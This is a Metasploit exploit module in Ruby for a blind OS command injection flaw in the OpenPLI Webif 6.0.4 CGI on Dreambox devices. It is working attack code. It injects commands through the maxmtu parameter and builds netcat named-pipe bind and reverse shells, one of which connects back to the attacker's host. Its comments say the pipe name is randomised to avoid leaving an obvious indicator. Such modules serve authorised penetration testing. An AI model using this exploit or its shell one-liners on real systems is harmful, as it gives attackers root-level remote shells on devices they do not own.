##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
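class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  # Tcp is kept for the lhost/lport helpers used when the command is built;
  # HttpClient supplies send_request_cgi and the connect/disconnect pair.
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options.
  #
  # The vulnerable CGI (/cgi-bin/setConfigSettings) takes configuration
  # values from the query string and hands them to a shell unquoted, so a
  # '&' inside the decoded maxmtu value ends the intended command and starts
  # the attacker's one. The injection is blind: nothing the command prints
  # comes back in the HTTP response.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'OpenPLI Webif v6.0.4 - Arbitrary Command Execution',
      'Description'    => %q{
        Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS Command injection.

        Tested on the following box:
        * Linux Kernel Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4)
        #1 Wed Aug 17 23:54:07 CEST 2011
        * Firmware release 1.1.0, 27.01.2013
        * FP Firmware 1.06
        * Web Interface 6.0.4-Expert - PLi edition by [lite]

        Note: This is a blind os command injection vulnerability. This means
        that you will not see any output of your command. Try a ping command
        to your local system for a first test.
      },
      'Author'         => [ 'm-1-k-3' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://openpli.org/' ],
          [ 'URL', 'http://openpli.org/wiki/Webif' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ],
          [ 'EDB', '24498' ],
          [ 'OSVDB', '90230' ]
        ],
      'Platform'       => ['unix', 'linux'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'netcat-e generic'
            }
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 08 2013'
    ))

    register_options(
      [
        Opt::RPORT(80),
      ], self.class)
  end

  # Injects the command for the selected payload through the maxmtu
  # parameter and then hands over to the payload handler.
  #
  # Everything after 'maxmtu=1500' is URI-encoded, including the two '&'
  # delimiters (%26), so the web server sees one parameter whose decoded
  # value is "1500&<cmd>&" and the shell behind the CGI runs our command
  # as a separate job.
  def exploit
    connect

    cmd = Rex::Text.uri_encode(build_command)
    uri = "/cgi-bin/setConfigSettings?maxmtu=1500%26#{cmd}%26"

    vprint_status("#{rhost}:#{rport} - Sending remote command ... \nCommand: #{cmd}")
    vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n")

    begin
      res = send_request_cgi({
        'uri'    => uri,
        'method' => 'GET'
      })
    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
      # No TCP connection at all: nothing was injected, so there is nothing
      # for the handler to pick up.
      print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
      return
    end

    # A nil response means the request went out but no reply came back
    # before the timeout. On this blind injection that is the likely
    # outcome of success for the bind/reverse variants: the netcat we start
    # stays attached to the CGI, so the server may never finish the
    # response. Aborting here (as the original did) would skip the handler
    # and a bind shell that is already listening would never be connected.
    unless res
      print_warning("#{rhost}:#{rport} - No HTTP response (blind injection, request may have timed out); running handler anyway")
    end

    handler
    disconnect
  end

  private

  # Shell command to run on the box, chosen by the name of the selected
  # payload (datastore['PAYLOAD']); returned unencoded.
  #
  # The bind and reverse variants are built here from a named pipe rather
  # than taken from payload.encoded, because the box's netcat has no -e
  # (see 'RequiredCmd' => 'netcat-e generic'). Only the generic payload is
  # sent as supplied by the user. The FIFO path is randomised per run so a
  # fixed /tmp/backpipe is not left on disk as a trivial indicator and two
  # runs against the same box do not share one pipe.
  def build_command
    payl = datastore['PAYLOAD']
    fifo = "/tmp/#{Rex::Text.rand_text_alpha(8)}"

    if payl =~ /bind/
      "mknod #{fifo} p; nc -l -p #{lport} 0<#{fifo} | /bin/sh 1>#{fifo}"
    elsif payl =~ /reverse/
      "mknod #{fifo} p; nc #{lhost} #{lport} 0<#{fifo} | /bin/sh 1>#{fifo}"
    else
      # cmd/unix/generic and similar: run whatever the user supplied as CMD
      payload.encoded
    end
  end
end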